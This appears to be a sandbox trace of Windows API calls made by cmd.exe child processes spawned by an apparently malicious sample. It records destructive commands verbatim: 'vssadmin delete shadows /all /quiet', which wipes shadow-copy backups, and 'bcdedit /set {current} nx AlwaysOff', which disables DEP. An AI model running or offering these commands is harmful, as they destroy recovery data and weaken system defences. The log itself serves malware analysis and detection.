	[0034.121] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0034.121] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0034.121] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0034.121] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0034.121] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0034.121] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0034.121] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0034.121] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0034.121] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0034.121] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0034.121] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0034.122] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0034.122] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0034.122] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0034.122] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0034.122] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0034.122] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0034.122] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0034.122] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0034.122] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0034.122] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0034.122] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0034.122] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0034.122] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0034.122] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0034.122] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0034.122] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0034.122] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0034.122] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0034.122] GetProcessHeap () returned 0x2f0000
	[0034.122] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304620 | out: hHeap=0x2f0000) returned 1
	[0034.122] GetProcessHeap () returned 0x2f0000
	[0034.122] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x12) returned 0x308370
	[0034.122] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
	[0034.123] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin.exe  delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x27edb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin.exe  delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x27ed60 | out: lpCommandLine="vssadmin.exe  delete shadows /all /quiet", lpProcessInformation=0x27ed60*(hProcess=0x54, hThread=0x50, dwProcessId=0x9e8, dwThreadId=0x9ec)) returned 1
	[0034.138] CloseHandle (hObject=0x50) returned 1
	[0034.138] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0034.138] GetProcessHeap () returned 0x2f0000
	[0034.138] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30d730 | out: hHeap=0x2f0000) returned 1
	[0034.138] GetEnvironmentStringsW () returned 0x30cc40*
	[0034.138] GetProcessHeap () returned 0x2f0000
	[0034.138] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xae8) returned 0x30d730
	[0034.138] FreeEnvironmentStringsW (penv=0x30cc40) returned 1
	[0034.138] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0
	[0075.972] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x27eca8 | out: lpExitCode=0x27eca8*=0x0) returned 1
	[0075.972] CloseHandle (hObject=0x54) returned 1
	[0075.973] _vsnwprintf (in: _Buffer=0x27ef18, _BufferCount=0x13, _Format="%08X", _ArgList=0x27ecb8 | out: _Buffer="00000000") returned 8
	[0075.973] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
	[0075.973] GetProcessHeap () returned 0x2f0000
	[0075.973] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30d730 | out: hHeap=0x2f0000) returned 1
	[0075.973] GetEnvironmentStringsW () returned 0x30cc40*
	[0075.973] GetProcessHeap () returned 0x2f0000
	[0075.973] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0e) returned 0x30ed40
	[0075.973] FreeEnvironmentStringsW (penv=0x30cc40) returned 1
	[0075.973] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0075.973] GetProcessHeap () returned 0x2f0000
	[0075.973] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30ed40 | out: hHeap=0x2f0000) returned 1
	[0075.973] GetEnvironmentStringsW () returned 0x30cc40*
	[0075.973] GetProcessHeap () returned 0x2f0000
	[0075.973] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0e) returned 0x30ed40
	[0075.973] FreeEnvironmentStringsW (penv=0x30cc40) returned 1
	[0075.973] GetProcessHeap () returned 0x2f0000
	[0075.973] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x308370 | out: hHeap=0x2f0000) returned 1
	[0075.973] DeleteProcThreadAttributeList (in: lpAttributeList=0x27ed78 | out: lpAttributeList=0x27ed78) 
	[0075.973] _get_osfhandle (_FileHandle=1) returned 0x7
	[0075.974] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0075.974] _get_osfhandle (_FileHandle=1) returned 0x7
	[0075.974] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3de194 | out: lpMode=0x4a3de194) returned 1
	[0075.974] _get_osfhandle (_FileHandle=0) returned 0x3
	[0075.974] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3de198 | out: lpMode=0x4a3de198) returned 1
	[0075.974] SetConsoleInputExeNameW () returned 0x1
	[0075.974] GetConsoleOutputCP () returned 0x1b5
	[0075.974] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3ebfe0 | out: lpCPInfo=0x4a3ebfe0) returned 1
	[0075.974] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0075.975] exit (_Code=0) 

Process:
	id = "7"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x50c30000"
	os_pid = "0x9b8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x958"
	cmd_line = "/C bcdedit.exe /set {current} nx AlwaysOff"
	cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 27
	os_tid = 0x9bc

	[0033.458] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fd20 | out: lpSystemTimeAsFileTime=0x24fd20*(dwLowDateTime=0xc1c261f0, dwHighDateTime=0x1d5956c)) 
	[0033.458] GetCurrentProcessId () returned 0x9b8
	[0033.458] GetCurrentThreadId () returned 0x9bc
	[0033.458] GetTickCount () returned 0x1142ab9
	[0033.458] QueryPerformanceCounter (in: lpPerformanceCount=0x24fd28 | out: lpPerformanceCount=0x24fd28*=15356289195) returned 1
	[0033.460] GetModuleHandleW (lpModuleName=0x0) returned 0x4a3b0000
	[0033.460] __set_app_type (_Type=0x1) 
	[0033.460] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a3d7810) returned 0x0
	[0033.460] __getmainargs (in: _Argc=0x4a3fa608, _Argv=0x4a3fa618, _Env=0x4a3fa610, _DoWildCard=0, _StartInfo=0x4a3de0f4 | out: _Argc=0x4a3fa608, _Argv=0x4a3fa618, _Env=0x4a3fa610) returned 0
	[0033.460] GetCurrentThreadId () returned 0x9bc
	[0033.460] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9bc) returned 0x3c
	[0033.460] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000
	[0033.460] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40
	[0033.460] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0033.708] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0033.708] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fcb8 | out: phkResult=0x24fcb8*=0x0) returned 0x2
	[0033.708] VirtualQuery (in: lpAddress=0x24fca0, lpBuffer=0x24fc20, dwLength=0x30 | out: lpBuffer=0x24fc20*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.708] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fc20, dwLength=0x30 | out: lpBuffer=0x24fc20*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.708] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fc20, dwLength=0x30 | out: lpBuffer=0x24fc20*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.709] VirtualQuery (in: lpAddress=0x154000, lpBuffer=0x24fc20, dwLength=0x30 | out: lpBuffer=0x24fc20*(BaseAddress=0x154000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0033.709] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fc20, dwLength=0x30 | out: lpBuffer=0x24fc20*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xf0000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0033.709] GetConsoleOutputCP () returned 0x1b5
	[0033.709] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3ebfe0 | out: lpCPInfo=0x4a3ebfe0) returned 1
	[0033.709] SetConsoleCtrlHandler (HandlerRoutine=0x4a3d3184, Add=1) returned 1
	[0033.709] _get_osfhandle (_FileHandle=1) returned 0x7
	[0033.709] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0033.709] _get_osfhandle (_FileHandle=1) returned 0x7
	[0033.709] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3de194 | out: lpMode=0x4a3de194) returned 1
	[0033.710] _get_osfhandle (_FileHandle=1) returned 0x7
	[0033.710] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0033.710] _get_osfhandle (_FileHandle=0) returned 0x3
	[0033.710] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3de198 | out: lpMode=0x4a3de198) returned 1
	[0033.710] GetEnvironmentStringsW () returned 0x35aa50*
	[0033.710] GetProcessHeap () returned 0x340000
	[0033.710] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xa7c) returned 0x35b4e0
	[0033.710] FreeEnvironmentStringsW (penv=0x35aa50) returned 1
	[0033.710] GetProcessHeap () returned 0x340000
	[0033.711] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x8) returned 0x35bf70
	[0033.711] GetEnvironmentStringsW () returned 0x35aa50*
	[0033.711] GetProcessHeap () returned 0x340000
	[0033.711] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xa7c) returned 0x35bf90
	[0033.711] FreeEnvironmentStringsW (penv=0x35aa50) returned 1
	[0033.711] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eb78 | out: phkResult=0x24eb78*=0x44) returned 0x0
	[0033.711] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24eb70, lpData=0x24eb90, lpcbData=0x24eb74*=0x1000 | out: lpType=0x24eb70*=0x0, lpData=0x24eb90*=0x18, lpcbData=0x24eb74*=0x1000) returned 0x2
	[0033.711] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24eb70, lpData=0x24eb90, lpcbData=0x24eb74*=0x1000 | out: lpType=0x24eb70*=0x4, lpData=0x24eb90*=0x1, lpcbData=0x24eb74*=0x4) returned 0x0
	[0033.711] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24eb70, lpData=0x24eb90, lpcbData=0x24eb74*=0x1000 | out: lpType=0x24eb70*=0x0, lpData=0x24eb90*=0x1, lpcbData=0x24eb74*=0x1000) returned 0x2
	[0033.711] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24eb70, lpData=0x24eb90, lpcbData=0x24eb74*=0x1000 | out: lpType=0x24eb70*=0x4, lpData=0x24eb90*=0x0, lpcbData=0x24eb74*=0x4) returned 0x0
	[0033.711] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24eb70, lpData=0x24eb90, lpcbData=0x24eb74*=0x1000 | out: lpType=0x24eb70*=0x4, lpData=0x24eb90*=0x40, lpcbData=0x24eb74*=0x4) returned 0x0
	[0033.711] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24eb70, lpData=0x24eb90, lpcbData=0x24eb74*=0x1000 | out: lpType=0x24eb70*=0x4, lpData=0x24eb90*=0x40, lpcbData=0x24eb74*=0x4) returned 0x0
	[0033.711] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24eb70, lpData=0x24eb90, lpcbData=0x24eb74*=0x1000 | out: lpType=0x24eb70*=0x0, lpData=0x24eb90*=0x40, lpcbData=0x24eb74*=0x1000) returned 0x2
	[0033.711] RegCloseKey (hKey=0x44) returned 0x0
	[0033.711] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eb78 | out: phkResult=0x24eb78*=0x44) returned 0x0
	[0033.711] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24eb70, lpData=0x24eb90, lpcbData=0x24eb74*=0x1000 | out: lpType=0x24eb70*=0x0, lpData=0x24eb90*=0x40, lpcbData=0x24eb74*=0x1000) returned 0x2
	[0033.711] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24eb70, lpData=0x24eb90, lpcbData=0x24eb74*=0x1000 | out: lpType=0x24eb70*=0x4, lpData=0x24eb90*=0x1, lpcbData=0x24eb74*=0x4) returned 0x0
	[0033.711] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24eb70, lpData=0x24eb90, lpcbData=0x24eb74*=0x1000 | out: lpType=0x24eb70*=0x0, lpData=0x24eb90*=0x1, lpcbData=0x24eb74*=0x1000) returned 0x2
	[0033.711] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24eb70, lpData=0x24eb90, lpcbData=0x24eb74*=0x1000 | out: lpType=0x24eb70*=0x4, lpData=0x24eb90*=0x0, lpcbData=0x24eb74*=0x4) returned 0x0
	[0033.712] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24eb70, lpData=0x24eb90, lpcbData=0x24eb74*=0x1000 | out: lpType=0x24eb70*=0x4, lpData=0x24eb90*=0x9, lpcbData=0x24eb74*=0x4) returned 0x0
	[0033.712] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24eb70, lpData=0x24eb90, lpcbData=0x24eb74*=0x1000 | out: lpType=0x24eb70*=0x4, lpData=0x24eb90*=0x9, lpcbData=0x24eb74*=0x4) returned 0x0
	[0033.712] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24eb70, lpData=0x24eb90, lpcbData=0x24eb74*=0x1000 | out: lpType=0x24eb70*=0x0, lpData=0x24eb90*=0x9, lpcbData=0x24eb74*=0x1000) returned 0x2
	[0033.712] RegCloseKey (hKey=0x44) returned 0x0
	[0033.712] time (in: timer=0x0 | out: timer=0x0) returned 0x5dc417d1
	[0033.712] srand (_Seed=0x5dc417d1) 
	[0033.712] GetCommandLineW () returned="/C bcdedit.exe /set {current} nx AlwaysOff"
	[0033.712] GetCommandLineW () returned="/C bcdedit.exe /set {current} nx AlwaysOff"
	[0033.712] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a3ec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25
	[0033.712] GetProcessHeap () returned 0x340000
	[0033.712] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x218) returned 0x35ca20
	[0033.712] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x35ca30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0033.712] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63
	[0033.712] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0033.712] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0033.712] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0033.712] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0033.712] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0033.712] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0033.712] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0033.713] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0033.713] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0033.713] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0033.713] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0033.713] GetProcessHeap () returned 0x340000
	[0033.713] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35b4e0 | out: hHeap=0x340000) returned 1
	[0033.713] GetEnvironmentStringsW () returned 0x35aa50*
	[0033.713] GetProcessHeap () returned 0x340000
	[0033.713] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xa94) returned 0x35cc40
	[0033.713] FreeEnvironmentStringsW (penv=0x35aa50) returned 1
	[0033.713] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0033.713] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0033.713] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0033.713] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0033.713] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0033.713] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0033.713] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0033.713] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0033.713] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0033.713] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0033.713] GetProcessHeap () returned 0x340000
	[0033.713] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x5c) returned 0x358300
	[0033.713] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f980 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25
	[0033.713] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x24f980, lpFilePart=0x24f960 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x24f960*="Desktop") returned 0x25
	[0033.713] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11
	[0033.714] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f690 | out: lpFindFileData=0x24f690*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x3599a0
	[0033.714] FindClose (in: hFindFile=0x3599a0 | out: hFindFile=0x3599a0) returned 1
	[0033.714] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x24f690 | out: lpFindFileData=0x24f690*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3599a0
	[0033.714] FindClose (in: hFindFile=0x3599a0 | out: hFindFile=0x3599a0) returned 1
	[0033.714] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20
	[0033.714] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x24f690 | out: lpFindFileData=0x24f690*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb9670240, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xb9670240, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x3599a0
	[0033.714] FindClose (in: hFindFile=0x3599a0 | out: hFindFile=0x3599a0) returned 1
	[0033.714] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11
	[0033.714] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1
	[0033.714] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1
	[0033.714] GetProcessHeap () returned 0x340000
	[0033.714] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35cc40 | out: hHeap=0x340000) returned 1
	[0033.714] GetEnvironmentStringsW () returned 0x35cc40*
	[0033.714] GetProcessHeap () returned 0x340000
	[0033.714] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xae8) returned 0x35d730
	[0033.714] FreeEnvironmentStringsW (penv=0x35cc40) returned 1
	[0033.715] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a3ec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25
	[0033.715] GetProcessHeap () returned 0x340000
	[0033.715] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x358300 | out: hHeap=0x340000) returned 1
	[0033.715] GetProcessHeap () returned 0x340000
	[0033.715] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x4016) returned 0x35e220
	[0033.715] GetProcessHeap () returned 0x340000
	[0033.715] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x64) returned 0x358300
	[0033.715] GetProcessHeap () returned 0x340000
	[0033.715] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35e220 | out: hHeap=0x340000) returned 1
	[0033.715] GetConsoleOutputCP () returned 0x1b5
	[0033.715] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3ebfe0 | out: lpCPInfo=0x4a3ebfe0) returned 1
	[0033.715] GetUserDefaultLCID () returned 0x409
	[0033.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a3e7b50, cchData=8 | out: lpLCData=":") returned 2
	[0033.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fa90, cchData=128 | out: lpLCData="0") returned 2
	[0033.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fa90, cchData=128 | out: lpLCData="0") returned 2
	[0033.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fa90, cchData=128 | out: lpLCData="1") returned 2
	[0033.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a3fa740, cchData=8 | out: lpLCData="/") returned 2
	[0033.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a3fa4a0, cchData=32 | out: lpLCData="Mon") returned 4
	[0033.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a3fa460, cchData=32 | out: lpLCData="Tue") returned 4
	[0033.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a3fa420, cchData=32 | out: lpLCData="Wed") returned 4
	[0033.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a3fa3e0, cchData=32 | out: lpLCData="Thu") returned 4
